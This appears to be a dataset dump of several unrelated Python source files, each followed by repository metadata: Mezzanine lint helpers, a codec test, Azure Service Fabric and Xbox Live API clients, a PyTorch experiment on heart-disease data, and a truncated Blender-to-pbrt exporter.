                for _ in range(3):
                    kwargs[parent_field] = second_level
                    model.objects.create(**kwargs)
def copy_test_to_media(module, name):
    """
    Copies a file (or directory tree) from Mezzanine's test data path to
    MEDIA_ROOT. Used in tests and demo fixtures.
    """
    source = os.path.join(path_for_import(module), "static", "test", name)
    target = os.path.join(settings.MEDIA_ROOT, name)
    target_dir = os.path.dirname(target)
    if not os.path.exists(target_dir):
        os.makedirs(target_dir)
    copy = copytree if os.path.isdir(source) else copyfile
    try:
        copy(source, target)
    except OSError:
        # Best effort: the destination may already exist.
        pass
def _run_checker_for_package(checker, package_name, extra_ignore=None):
    """
    Runs the checker function across every Python module in the
    given package, yielding each warning that does not match any of
    the ignore strings.
    """
    ignore_strings = IGNORE_ERRORS
    if extra_ignore:
        ignore_strings += extra_ignore
    package_path = path_for_import(package_name)
    for root, dirs, files in os.walk(str(package_path)):
        # Skip everything inside migrations directories.
        in_migrations = root.split(os.sep)[-1] in ["migrations"]
        for f in files:
            if f == "local_settings.py" or not f.endswith(".py") or in_migrations:
                continue
            for warning in checker(os.path.join(root, f)):
                if not any(ignore in warning for ignore in ignore_strings):
                    # Report paths relative to the package name.
                    yield warning.replace(package_path, package_name, 1)
def run_pyflakes_for_package(package_name, extra_ignore=None):
    """
    If pyflakes is installed, run it across the given package name
    returning any warnings found.
    """
    from pyflakes.checker import Checker

    def pyflakes_checker(path):
        # Yield one warning string per pyflakes message in the file at `path`.
        # Plain text mode already provides universal-newline handling; the
        # "U" mode flag the original passed was deprecated for years and
        # removed in Python 3.11 (open() raises ValueError on it).
        with open(path) as source_file:
            source = source_file.read()
        try:
            tree = compile(source, path, "exec", PyCF_ONLY_AST)
        except (SyntaxError, IndentationError) as value:
            info = (path, value.lineno, value.args[0])
            yield "Invalid syntax in %s:%d: %s" % info
        else:
            result = Checker(tree, path)
            for warning in result.messages:
                yield str(warning)

    args = (pyflakes_checker, package_name, extra_ignore)
    return _run_checker_for_package(*args)
def run_pep8_for_package(package_name, extra_ignore=None):
    """
    If pep8 is installed, run it across the given package name
    returning any warnings or errors found.
    """
    import pep8
    class Checker(pep8.Checker):
        """
        Subclass pep8's Checker to hook into error reporting.
        """
        def __init__(self, *args, **kwargs):
            super(Checker, self).__init__(*args, **kwargs)
            # Redirect pep8's internal error reporting into our collector.
            self.report_error = self._report_error
        def _report_error(self, line_number, offset, text, check):
            """
            Store pairs of line numbers and errors.
            """
            # `text` is "<code> <message>"; keep only the message part.
            self.errors.append((line_number, text.split(" ", 1)[1]))
        def check_all(self, *args, **kwargs):
            """
            Assign the errors attribute and return it after running.
            """
            self.errors = []
            super(Checker, self).check_all(*args, **kwargs)
            return self.errors
    def pep8_checker(path):
        # Yield "path:line: message" strings for every style issue in `path`.
        for line_number, text in Checker(path).check_all():
            yield "%s:%s: %s" % (path, line_number, text)
    args = (pep8_checker, package_name, extra_ignore)
    return _run_checker_for_package(*args)
| 31.907767
| 72
| 0.630762
|
a3eef047d7ffe31a7cc5a4f08a79b7cf02c34fb3
| 370
|
py
|
Python
|
third_party/python/Lib/test/test_codecmaps_hk.py
|
appotry/cosmopolitan
|
af4687cc3f2331a23dc336183ab58fe001cda082
|
[
"ISC"
] | null | null | null |
third_party/python/Lib/test/test_codecmaps_hk.py
|
appotry/cosmopolitan
|
af4687cc3f2331a23dc336183ab58fe001cda082
|
[
"ISC"
] | null | null | null |
third_party/python/Lib/test/test_codecmaps_hk.py
|
appotry/cosmopolitan
|
af4687cc3f2331a23dc336183ab58fe001cda082
|
[
"ISC"
] | null | null | null |
#
# test_codecmaps_hk.py
# Codec mapping tests for HongKong encodings
#
from test import multibytecodec_support
import unittest
class TestBig5HKSCSMap(multibytecodec_support.TestBase_Mapping,
                       unittest.TestCase):
    # Round-trip codec mapping test for the Hong Kong big5hkscs codec;
    # the TestBase_Mapping base class drives the comparison against the
    # mapping table referenced below.
    encoding = 'big5hkscs'
    # HKSCS-2004 mapping table bundled in the zip store.
    mapfileurl = '/zip/.python/test/BIG5HKSCS-2004.TXT'
if __name__ == "__main__":
    unittest.main()
| 23.125
| 63
| 0.721622
|
88a0f5eda9f041e42a7c068ef86f5c2a1e798a82
| 97
|
py
|
Python
|
tests/pitchShift.py
|
skratchdot/media-tools
|
bca0c683fb637aeefda1c49454a118f809047d97
|
[
"MIT"
] | 13
|
2019-12-09T07:56:13.000Z
|
2021-08-03T01:45:53.000Z
|
tests/pitchShift.py
|
skratchdot/media-tools
|
bca0c683fb637aeefda1c49454a118f809047d97
|
[
"MIT"
] | 1
|
2020-04-29T00:00:14.000Z
|
2021-07-09T14:24:19.000Z
|
tests/pitchShift.py
|
skratchdot/media-tools
|
bca0c683fb637aeefda1c49454a118f809047d97
|
[
"MIT"
] | 3
|
2020-04-27T15:36:36.000Z
|
2021-03-29T17:52:35.000Z
|
# -*- coding: utf-8 -*-
import librosa
# Load the sample speech clip: ``y`` is the waveform array, ``sr`` the
# sample rate. NOTE(review): no sr= override is passed, so librosa will
# resample to its default rate -- confirm that is intended.
y, sr = librosa.load("../media/sample/speech_clip.wav")
| 16.166667
| 55
| 0.639175
|
420ccd342c06516e9e81defb7773dbed9e67232b
| 4,478
|
py
|
Python
|
sdk/servicefabric/azure-servicefabric/azure/servicefabric/_service_fabric_client_ap_is.py
|
vincenttran-msft/azure-sdk-for-python
|
348b56f9f03eeb3f7b502eed51daf494ffff874d
|
[
"MIT"
] | 2,728
|
2015-01-09T10:19:32.000Z
|
2022-03-31T14:50:33.000Z
|
sdk/servicefabric/azure-servicefabric/azure/servicefabric/_service_fabric_client_ap_is.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 17,773
|
2015-01-05T15:57:17.000Z
|
2022-03-31T23:50:25.000Z
|
sdk/servicefabric/azure-servicefabric/azure/servicefabric/_service_fabric_client_ap_is.py
|
v-xuto/azure-sdk-for-python
|
9c6296d22094c5ede410bc83749e8df8694ccacc
|
[
"MIT"
] | 1,916
|
2015-01-19T05:05:41.000Z
|
2022-03-31T19:36:44.000Z
|
# coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.service_client import SDKClient
from msrest import Serializer, Deserializer
from ._configuration import ServiceFabricClientAPIsConfiguration
from .operations import ServiceFabricClientAPIsOperationsMixin
from .operations import MeshSecretOperations
from .operations import MeshSecretValueOperations
from .operations import MeshVolumeOperations
from .operations import MeshNetworkOperations
from .operations import MeshApplicationOperations
from .operations import MeshServiceOperations
from .operations import MeshCodePackageOperations
from .operations import MeshServiceReplicaOperations
from .operations import MeshGatewayOperations
from . import models
class ServiceFabricClientAPIs(ServiceFabricClientAPIsOperationsMixin, SDKClient):
    """Service Fabric REST Client APIs allows management of Service Fabric clusters, applications and services.
    :ivar config: Configuration for client.
    :vartype config: ServiceFabricClientAPIsConfiguration
    :ivar mesh_secret: MeshSecret operations
    :vartype mesh_secret: azure.servicefabric.operations.MeshSecretOperations
    :ivar mesh_secret_value: MeshSecretValue operations
    :vartype mesh_secret_value: azure.servicefabric.operations.MeshSecretValueOperations
    :ivar mesh_volume: MeshVolume operations
    :vartype mesh_volume: azure.servicefabric.operations.MeshVolumeOperations
    :ivar mesh_network: MeshNetwork operations
    :vartype mesh_network: azure.servicefabric.operations.MeshNetworkOperations
    :ivar mesh_application: MeshApplication operations
    :vartype mesh_application: azure.servicefabric.operations.MeshApplicationOperations
    :ivar mesh_service: MeshService operations
    :vartype mesh_service: azure.servicefabric.operations.MeshServiceOperations
    :ivar mesh_code_package: MeshCodePackage operations
    :vartype mesh_code_package: azure.servicefabric.operations.MeshCodePackageOperations
    :ivar mesh_service_replica: MeshServiceReplica operations
    :vartype mesh_service_replica: azure.servicefabric.operations.MeshServiceReplicaOperations
    :ivar mesh_gateway: MeshGateway operations
    :vartype mesh_gateway: azure.servicefabric.operations.MeshGatewayOperations
    :param credentials: Subscription credentials which uniquely identify
    client subscription.
    :type credentials: None
    :param str base_url: Service URL
    """
    # NOTE: AutoRest-generated client -- edits here will be lost on
    # regeneration; change the generator templates instead.
    def __init__(
            self, credentials, base_url=None):
        self.config = ServiceFabricClientAPIsConfiguration(credentials, base_url)
        super(ServiceFabricClientAPIs, self).__init__(self.config.credentials, self.config)
        # Collect every model class from the generated models module so the
        # (de)serializers can resolve types by name.
        client_models = {k: v for k, v in models.__dict__.items() if isinstance(v, type)}
        self.api_version = '8.2'
        self._serialize = Serializer(client_models)
        self._deserialize = Deserializer(client_models)
        # One operations facade per Mesh resource group, all sharing the
        # same transport, config and (de)serializers.
        self.mesh_secret = MeshSecretOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_secret_value = MeshSecretValueOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_volume = MeshVolumeOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_network = MeshNetworkOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_application = MeshApplicationOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_service = MeshServiceOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_code_package = MeshCodePackageOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_service_replica = MeshServiceReplicaOperations(
            self._client, self.config, self._serialize, self._deserialize)
        self.mesh_gateway = MeshGatewayOperations(
            self._client, self.config, self._serialize, self._deserialize)
| 50.314607
| 111
| 0.756141
|
162bf4d30ece1e561415bcd3deb71e40d9058b1d
| 5,797
|
py
|
Python
|
xbox/webapi/api/client.py
|
Elon-Maks/xbox-webapi-python
|
14fc5cda72038ad3e71ee9fbd36f7d7b27f4f787
|
[
"MIT"
] | null | null | null |
xbox/webapi/api/client.py
|
Elon-Maks/xbox-webapi-python
|
14fc5cda72038ad3e71ee9fbd36f7d7b27f4f787
|
[
"MIT"
] | null | null | null |
xbox/webapi/api/client.py
|
Elon-Maks/xbox-webapi-python
|
14fc5cda72038ad3e71ee9fbd36f7d7b27f4f787
|
[
"MIT"
] | null | null | null |
"""
Xbox Live Client
Basic factory that stores :class:`XboxLiveLanguage`, User authorization data
and available `Providers`
"""
import logging
from typing import Any
from aiohttp import hdrs
from aiohttp.client import ClientResponse
from ms_cv import CorrelationVector
from xbox.webapi.api.language import DefaultXboxLiveLanguages, XboxLiveLanguage
from xbox.webapi.api.provider.account import AccountProvider
from xbox.webapi.api.provider.achievements import AchievementsProvider
from xbox.webapi.api.provider.catalog import CatalogProvider
from xbox.webapi.api.provider.cqs import CQSProvider
from xbox.webapi.api.provider.gameclips import GameclipProvider
from xbox.webapi.api.provider.lists import ListsProvider
from xbox.webapi.api.provider.message import MessageProvider
from xbox.webapi.api.provider.people import PeopleProvider
from xbox.webapi.api.provider.presence import PresenceProvider
from xbox.webapi.api.provider.profile import ProfileProvider
from xbox.webapi.api.provider.screenshots import ScreenshotsProvider
from xbox.webapi.api.provider.smartglass import SmartglassProvider
from xbox.webapi.api.provider.titlehub import TitlehubProvider
from xbox.webapi.api.provider.usersearch import UserSearchProvider
from xbox.webapi.api.provider.userstats import UserStatsProvider
from xbox.webapi.authentication.manager import AuthenticationManager
log = logging.getLogger("xbox.api")
class Session:
    """Thin async HTTP wrapper that injects Xbox Live authorization and
    MS-CV correlation headers into every request before delegating to an
    aiohttp session."""

    def __init__(self, auth_mgr: AuthenticationManager):
        self._auth_mgr = auth_mgr
        # Correlation vector: incremented once per outgoing request.
        self._cv = CorrelationVector()

    async def request(
        self,
        method: str,
        url: str,
        include_auth: bool = True,
        include_cv: bool = True,
        **kwargs: Any,
    ) -> ClientResponse:
        """Proxy Request and add Auth/CV headers.

        ``extra_headers`` / ``extra_params`` / ``extra_data`` kwargs are
        merged on top of ``headers`` / ``params`` / ``data``.  A
        ``session`` kwarg may supply an explicit aiohttp session;
        otherwise the authentication manager's session is used.
        """
        headers = kwargs.pop("headers", {})
        params = kwargs.pop("params", None)
        data = kwargs.pop("data", None)
        # Extra, user supplied values
        extra_headers = kwargs.pop("extra_headers", None)
        extra_params = kwargs.pop("extra_params", None)
        extra_data = kwargs.pop("extra_data", None)
        if include_auth:
            # Ensure tokens valid
            await self._auth_mgr.refresh_tokens()
            # Set auth header
            headers[
                hdrs.AUTHORIZATION
            ] = self._auth_mgr.xsts_token.authorization_header_value
        if include_cv:
            headers["MS-CV"] = self._cv.increment()
        # Extend with optionally supplied values
        if extra_headers:
            headers.update(extra_headers)
        if extra_params:
            # query parameters
            params = params or {}
            params.update(extra_params)
        if extra_data:
            # form encoded post data
            data = data or {}
            data.update(extra_data)
        session = kwargs.pop("session", None)
        if session is None:
            if self._auth_mgr.session is None:
                # Message typos fixed ("proxy_sesssions" -> "proxy_sessions",
                # "requsts" -> "requests"); exception type kept for
                # backward compatibility with existing callers.
                raise Exception(
                    "Failed! If AuthenticationManager is created with "
                    "proxy_sessions, the session for requests should be "
                    'passed explicitly, through the "session" argument'
                )
            return await self._auth_mgr.session.request(
                method, url, **kwargs, headers=headers, params=params, data=data
            )
        else:
            return await session.request(
                method, url, **kwargs, headers=headers, params=params, data=data
            )

    async def get(self, url: str, **kwargs: Any) -> ClientResponse:
        return await self.request(hdrs.METH_GET, url, **kwargs)

    async def options(self, url: str, **kwargs: Any) -> ClientResponse:
        return await self.request(hdrs.METH_OPTIONS, url, **kwargs)

    async def head(self, url: str, **kwargs: Any) -> ClientResponse:
        return await self.request(hdrs.METH_HEAD, url, **kwargs)

    async def post(self, url: str, **kwargs: Any) -> ClientResponse:
        return await self.request(hdrs.METH_POST, url, **kwargs)

    async def put(self, url: str, **kwargs: Any) -> ClientResponse:
        return await self.request(hdrs.METH_PUT, url, **kwargs)

    async def patch(self, url: str, **kwargs: Any) -> ClientResponse:
        return await self.request(hdrs.METH_PATCH, url, **kwargs)

    async def delete(self, url: str, **kwargs: Any) -> ClientResponse:
        return await self.request(hdrs.METH_DELETE, url, **kwargs)
class XboxLiveClient:
    # Facade bundling one provider object per Xbox Live web API area,
    # all sharing a single authenticated Session.
    def __init__(
        self,
        auth_mgr: AuthenticationManager,
        language: XboxLiveLanguage = DefaultXboxLiveLanguages.United_States,
    ):
        self._auth_mgr = auth_mgr
        self.session = Session(auth_mgr)
        self._language = language
        # One provider per API surface; each receives this client so it can
        # reach the shared session and language settings.
        self.cqs = CQSProvider(self)
        self.lists = ListsProvider(self)
        self.profile = ProfileProvider(self)
        self.achievements = AchievementsProvider(self)
        self.usersearch = UserSearchProvider(self)
        self.gameclips = GameclipProvider(self)
        self.people = PeopleProvider(self)
        self.presence = PresenceProvider(self)
        self.message = MessageProvider(self)
        self.userstats = UserStatsProvider(self)
        self.screenshots = ScreenshotsProvider(self)
        self.titlehub = TitlehubProvider(self)
        self.account = AccountProvider(self)
        self.catalog = CatalogProvider(self)
        self.smartglass = SmartglassProvider(self)

    @property
    def xuid(self) -> str:
        """
        Gets the Xbox User ID

        Returns: Xbox user Id
        """
        return self._auth_mgr.xsts_token.xuid

    @property
    def language(self) -> XboxLiveLanguage:
        """
        Gets the active Xbox Live Language

        Returns: Active Xbox Live language
        """
        return self._language
| 36.23125
| 119
| 0.671899
|
bf4af9db552cee6c1d9dc665f6da6a64444ee87e
| 3,123
|
py
|
Python
|
HeartNet.py
|
royJackman/SineCircleMappings
|
8638689e7efdb41f277e766e0144686c12b1cc16
|
[
"MIT"
] | 1
|
2021-06-13T16:26:43.000Z
|
2021-06-13T16:26:43.000Z
|
HeartNet.py
|
royJackman/SineCircleMappings
|
8638689e7efdb41f277e766e0144686c12b1cc16
|
[
"MIT"
] | null | null | null |
HeartNet.py
|
royJackman/SineCircleMappings
|
8638689e7efdb41f277e766e0144686c12b1cc16
|
[
"MIT"
] | 1
|
2021-06-13T16:29:15.000Z
|
2021-06-13T16:29:15.000Z
|
import json
import torch
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
from colour import Color
from MixedNet import MixedNet
from mpl_toolkits.mplot3d import Axes3D

# Grid search over MixedNet hidden-layer compositions (counts of sin /
# tanh / log nodes summing to ``layer_width``) on a heart-disease CSV
# (presumably the UCI heart dataset -- TODO confirm), recording the best
# test MSE per composition and plotting it as a colored 3D scatter.
torch.manual_seed(0)
device = torch.device('cuda:0' if torch.cuda.is_available() else 'cpu')
cols = ['age', 'sex', 'cp', 'trestbps', 'chol', 'fbs', 'restecg', 'thalach', 'exang', 'oldpeak', 'slope', 'ca', 'thal', 'target']
data = pd.read_csv('Data/heart.csv')
data = torch.tensor(data[cols].values).double()
# Last column ('target') is the label; the remaining 13 are features.
target = data[:, -1:]
data = data[:, :-1]
plot_data = [[], [], []]   # sin/tanh/log node counts per architecture
best = []                  # best (lowest) test MSE per architecture
examples = data.shape[0]
epochs = 300
colors = 1000              # resolution of the blue->orange color gradient
layer_width = 16           # total nodes per mixed layer
# 80/20 train/test split by row order (no shuffling).
eighty = int(0.8 * examples)
twenty = examples - eighty
performance_statistics = {}
architectures = []
# Enumerate every (i, j, layer_width-i-j) split of the layer.  Each entry
# is [layer_spec, layer_spec, result_spec]; the final element is popped
# off below and passed to MixedNet separately.
for i in range(0, layer_width):
    rem = layer_width - i
    for j in range(0, rem):
        mod = rem - j
        architectures.append([[i, j, layer_width - (i+j)], [i, j, layer_width - (i+j)], [layer_width, layer_width]])
for i, a in enumerate(architectures):
    res = a.pop()
    print(f'Model {i + 1}: {len(res)} layer(s) with size(s) {a}')
    # for j, l in enumerate(a):
    # print(f'Layer {j+1}: {l[0]} sin, {l[1]} tanh, {l[2]} log')
    model = MixedNet(13, 1, res, a).double()
    crit = torch.nn.MSELoss()
    opti = torch.optim.Adam(model.parameters(), lr = 0.01)
    arch_loss = 0.0   # average training loss across epochs
    min_arch = 1000.0 # best test loss seen for this architecture
    arch_test = 0.0   # average test loss across epochs
    for e in range(epochs):
        # NOTE: ``i`` is reused here as the minibatch cursor, shadowing
        # the architecture index (only needed for the print above).
        i = 0
        batch = 0
        epoch_loss = 0.0
        # Minibatches of 64 rows over the training split.
        while i < eighty:
            opti.zero_grad()
            batch += 1
            last = i
            i = min(last + 64, eighty)
            pred = model(data[last:i, :].double())
            loss = crit(pred, target[last:i].double())
            epoch_loss += loss.item()
            loss.backward(retain_graph=True)
            opti.step()
        arch_loss += epoch_loss/float(epochs)
        # Evaluate on the held-out 20% after every epoch.
        pred = model(data[eighty:].double())
        loss = crit(pred, target[eighty:].double())
        if loss.item() < min_arch:
            min_arch = loss.item()
        arch_test += loss.item()/float(epochs)
    plot_data[0].append(a[0][0])
    plot_data[1].append(a[0][1])
    plot_data[2].append(a[0][2])
    best.append(min_arch)
    performance_statistics[f'Layer {a[0][0]} sin, {a[0][1]} tanh, {a[0][2]} log'] = min_arch
    # print(f'Avg train MSE: {arch_loss}, Avg test MSE: {arch_test}, Best test MSE: {min_arch}\n----------------------')
# with open('heartnet.json', 'w') as f:
# json.dump(performance_statistics, f)
gradient = list(Color('blue').range_to(Color('orange'), colors))
fig = plt.figure()
ax = fig.add_subplot(111, projection='3d')
print(min(best), max(best))
# Normalize the best losses into [0, colors) and map to gradient colors.
mn = min(best)
best = [b - mn for b in best]
mx = max(best)
best = [int((b*colors)/mx) for b in best]
best = [gradient[max(0, min(b, colors-1))].hex for b in best]
ax.scatter(*plot_data, c=best)
# ax.suptitle(f'Lowest loss after 300 epochs in network with 2 layers with [30, 30] nodes')
ax.set_xlabel('Sin nodes')
ax.set_ylabel('Tanh nodes')
ax.set_zlabel('Log nodes')
# grad = fig.add_subplot(1, 4, 4)
# grad.imshow([[]])
plt.show()
| 30.320388
| 129
| 0.600384
|
ddfc72d2a6f7bcd98007ee6a133fdc6dc953ff61
| 313,362
|
py
|
Python
|
exporters/blender/pbrtBlend.py
|
patwonder/pbrt-v2-skin
|
a6a58e5287925798c2d37adea6054dbec4587e4b
|
[
"BSD-2-Clause"
] | 3
|
2020-12-09T00:03:29.000Z
|
2021-07-03T13:31:41.000Z
|
exporters/blender/pbrtBlend.py
|
patwonder/pbrt-v2-skin
|
a6a58e5287925798c2d37adea6054dbec4587e4b
|
[
"BSD-2-Clause"
] | null | null | null |
exporters/blender/pbrtBlend.py
|
patwonder/pbrt-v2-skin
|
a6a58e5287925798c2d37adea6054dbec4587e4b
|
[
"BSD-2-Clause"
] | 1
|
2020-11-28T12:33:24.000Z
|
2020-11-28T12:33:24.000Z
|
#!BPY
# -*- coding: utf-8 -*-
# coding=utf-8
"""Registration info for Blender menus:
Name: 'pbrt v2.0 alpha Exporter'
Blender: 248
Group: 'Render'
Tooltip: 'Export/Render to pbrt v2.0 scene format (.pbrt)'
"""
__author__ = "radiance, zuegs, ideasman42, luxblender, dougal2, mmp"
__version__ = "0.6"
__url__ = [
"http://www.pbrt.org/",
]
__bpydoc__ = """\
This exporter is based on the LuxBlend v0.6 exporter.
Useful links:
- For updates: http://www.luxrender.net/forum/viewforum.php?f=11
- For Blender Tutorial: http://www.luxrender.net/wiki/index.php/Tutorial_1:_Your_first_scene_%26_render
Usage:
- Run the script from the render menu.
- Set the default location of the pbrt.exe.
"""
#
# ***** BEGIN GPL LICENSE BLOCK *****
#
# --------------------------------------------------------------------------
# LuxBlend v0.6 exporter
# --------------------------------------------------------------------------
#
# Authors:
# radiance, zuegs, ideasman42, luxblender, dougal2
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
#
# ***** END GPL LICENCE BLOCK *****
# --------------------------------------------------------------------------
######################################################
# Importing modules
######################################################
import math
import time
import os
import sys as osys
import types
import subprocess
import Blender
from Blender import Mesh, Scene, Object, Material, Texture, Window, sys, Draw, BGL, Mathutils, Lamp, Image
######################################################
# Functions
######################################################
# New name based on old with a different extension
def newFName(ext):
    """Return the current .blend filename with its extension replaced by *ext*."""
    current = Blender.Get('filename')
    ext_len = len(current.split('.', -1)[-1])
    return current[:-ext_len] + ext
# some helpers
def luxstr(str):
    """Escape backslashes so the string is safe inside a pbrt scene file."""
    # NOTE(review): parameter shadows builtin ``str``; name kept for API compat.
    escaped = str.replace("\\", "\\\\")
    return escaped
### relpath ##########################
def relpath(base, target):
    """Return *target* expressed relative to *base* (both made absolute)."""
    # Network-style "//" or "\\" prefixes are stripped, not resolved.
    if target[0:2] == "\\\\" or target[0:2] == "//":
        return target[2:len(target)]
    if not os.path.isabs(base):
        base = os.path.abspath(base)
    if not os.path.isabs(target):
        target = os.path.abspath(target)
    if os.sep == "\\":
        # Case-insensitive filesystem: normalize before comparing.
        base = os.path.normcase(base)
        target = os.path.normcase(target)
    if base == os.sep:
        return '.' + target
    parts_base = base.split(os.sep)
    if parts_base[-1] == "":
        parts_base = parts_base[:-1]
    parts_target = target.split(os.sep)
    # Length of the common leading path.
    common = 0
    limit = min(len(parts_base), len(parts_target))
    while common < limit and parts_base[common] == parts_target[common]:
        common += 1
    if common == 0:
        return os.sep.join(parts_target)
    if common == len(parts_base):
        # Target lies under base: just the trailing components.
        return os.sep.join(parts_target[common:])
    # Climb out of base's unshared components, then descend into target.
    ups = ('..' + os.sep) * (len(parts_base) - common)
    return ups + os.sep.join(parts_target[common:])
### luxFilePath #####################
lxs_filename = ""
previewing = False
def luxFilePath(filename):
    """Convert *filename* according to the scene's configured path mode."""
    global lxs_filename, previewing
    scn = Scene.GetCurrent()
    mode = luxProp(scn, "pathmode", "absolute").get()
    # Previews always use absolute paths regardless of the chosen mode.
    if previewing or (mode == "absolute"):
        return filename
    if mode == "relative":
        # Relative to the directory of the exported .lxs scene file.
        return relpath(os.path.dirname(lxs_filename), filename)
    if mode == "flat":
        # Flat mode keeps only the basename.
        return os.path.basename(filename)
###### RGC ##########################
def rg(col):
    """Apply reverse gamma correction (and optional clamping) to *col*."""
    scn = Scene.GetCurrent()
    if luxProp(scn, "RGC", "true").get() == "true":
        gamma = luxProp(scn, "film.gamma", 2.2).get()
    else:
        gamma = 1.0
    corrected = col ** gamma
    if luxProp(scn, "colorclamp", "false").get() == "true":
        # Scale down by 10% and clamp into [0.0, 0.9].
        corrected = min(max(corrected * 0.9, 0.0), 0.9)
    return corrected
def texturegamma():
    """Return the gamma used for texture correction (1.0 when RGC is off)."""
    scn = Scene.GetCurrent()
    if luxProp(scn, "RGC", "true").get() != "true":
        return 1.0
    return luxProp(scn, "film.gamma", 2.2).get()
def exportMaterial(mat):
    """Return the full declaration block (comment header + body) for *mat*."""
    header = "# Material '%s'\n" % mat.name
    return header + luxMaterial(mat) + "\n"
def exportMaterialGeomTag(mat):
    """Return the material link line stored in the material's "link" property."""
    link = luxProp(mat, "link", "").get()
    return "%s\n" % (link)
################################################################
dummyMat = 2394723948 # random identifier for dummy material
clayMat = None
#-------------------------------------------------
# getMaterials(obj)
# helper function to get the material list of an object in respect of obj.colbits
#-------------------------------------------------
def getMaterials(obj, compress=False):
    """
    Return up to 16 material slots for *obj*, honouring obj.colbits
    (each bit selects the object-level material over the mesh-level
    one). With compress=True, empty slots are dropped. When the
    scene's "clay" option is on, non-special materials are replaced
    by a shared clay material.
    """
    global clayMat
    mats = [None]*16
    colbits = obj.colbits
    objMats = obj.getMaterials(1)
    data = obj.getData(mesh=1)
    # Mesh-level materials: API differs between datablock types, so fall
    # back progressively; if neither works, force object-level materials.
    try:
        dataMats = data.materials
    except:
        try:
            dataMats = data.getMaterials(1)
        except:
            dataMats = []
            colbits = 0xffff
    m = max(len(objMats), len(dataMats))
    if m>0:
        # Pad both lists so indexing up to 16 slots never fails.
        objMats.extend([None]*16)
        dataMats.extend([None]*16)
        for i in range(m):
            # Bit set -> object material wins over mesh material.
            if (colbits & (1<<i) > 0):
                mats[i] = objMats[i]
            else:
                mats[i] = dataMats[i]
        if compress:
            mats = [m for m in mats if m]
    slots = [m for m in mats if m]
    if m==0 or not slots:
        print("Warning: object %s has no material assigned" % (obj.getName()))
        mats = []
    # clay option
    if luxProp(Scene.GetCurrent(), "clay", "false").get()=="true":
        # Lazily create the shared clay material on first use.
        if clayMat==None: clayMat = Material.New("lux_clayMat")
        for i in range(len(mats)):
            if mats[i]:
                mattype = luxProp(mats[i], "type", "").get()
                # Portals/lights/volumes keep their material under clay mode.
                if (mattype not in ["portal","light","boundvolume"]): mats[i] = clayMat
    return mats
######################################################
# luxExport class
######################################################
class luxExport:
#-------------------------------------------------
# __init__
# initializes the exporter object
#-------------------------------------------------
    def __init__(self, scene):
        """Initialize the exporter for *scene* with empty collection state."""
        self.scene = scene
        self.camera = scene.objects.camera
        self.objects = []    # [obj, matrix] pairs to export as geometry
        self.portals = []    # objects whose first material marks a portal
        self.volumes = []    # objects marked as bound volumes
        self.meshes = {}     # mesh datablock name -> list of objects using it
        self.materials = []  # unique materials encountered during analysis
        self.lights = []     # [lamp, matrix] pairs
        self.duplis = set()  # parents whose duplicated children were expanded
#-------------------------------------------------
# analyseObject(self, obj, matrix, name)
# called by analyseScene to build the lists before export
#-------------------------------------------------
    def analyseObject(self, obj, matrix, name, isOriginal=True, isDupli=False):
        """
        Classify *obj* into the exporter's lists (objects / portals /
        volumes / lights / meshes / materials), recursing into duplicated
        objects. Returns True when the object contributes light.
        """
        light = False
        if (obj.users > 0):
            obj_type = obj.getType()
            if (obj.enableDupFrames and isOriginal):
                # DupFrames: recurse over the frame-duplicated copies.
                for o, m in obj.DupObjects:
                    self.analyseObject(o, m, "%s.%s"%(name, o.getName()), False)
            if (obj.enableDupGroup or obj.enableDupVerts or obj.enableDupFaces):
                # Remember the parent so its non-dupli children are skipped.
                self.duplis.add(obj)
                for o, m in obj.DupObjects:
                    self.analyseObject(o, m, "%s.%s"%(name, o.getName()), True, True)
            elif ((isDupli or (not obj.getParent() in self.duplis)) and ((obj_type == "Mesh") or (obj_type == "Surf") or (obj_type == "Curve") or (obj_type == "Text"))):
                mats = getMaterials(obj)
                # The first material slot decides portal / bound-volume status.
                if (len(mats)>0) and (mats[0]!=None) and ((mats[0].name=="PORTAL") or (luxProp(mats[0], "type", "").get()=="portal")):
                    self.portals.append([obj, matrix])
                elif (len(mats)>0) and (luxProp(mats[0], "type", "").get()=="boundvolume"):
                    self.volumes.append([obj, matrix])
                else:
                    for mat in mats:
                        if (mat!=None) and (mat not in self.materials):
                            self.materials.append(mat)
                        # Emissive material -> this object counts as a light.
                        if (mat!=None) and ((luxProp(mat, "type", "").get()=="light") or (luxProp(mat, "emission", "false").get()=="true")):
                            light = True
                    mesh_name = obj.getData(name_only=True)
                    # Group objects by shared mesh datablock for instancing.
                    try:
                        self.meshes[mesh_name] += [obj]
                    except KeyError:
                        self.meshes[mesh_name] = [obj]
                    self.objects.append([obj, matrix])
            elif (obj_type == "Lamp"):
                ltype = obj.getData(mesh=1).getType() # data
                # Only point, spot and area lamps are exported.
                if (ltype == Lamp.Types["Lamp"]) or (ltype == Lamp.Types["Spot"]) or (ltype == Lamp.Types["Area"]):
                    self.lights.append([obj, matrix])
                    light = True
        return light
#-------------------------------------------------
# analyseScene(self)
# this function builds the lists of object, lights, meshes and materials before export
#-------------------------------------------------
def analyseScene(self):
light = False
for obj in self.scene.objects:
if ((obj.Layers & self.scene.Layers) > 0):
if self.analyseObject(obj, obj.getMatrix(), obj.getName()): light = True
return light
#-------------------------------------------------
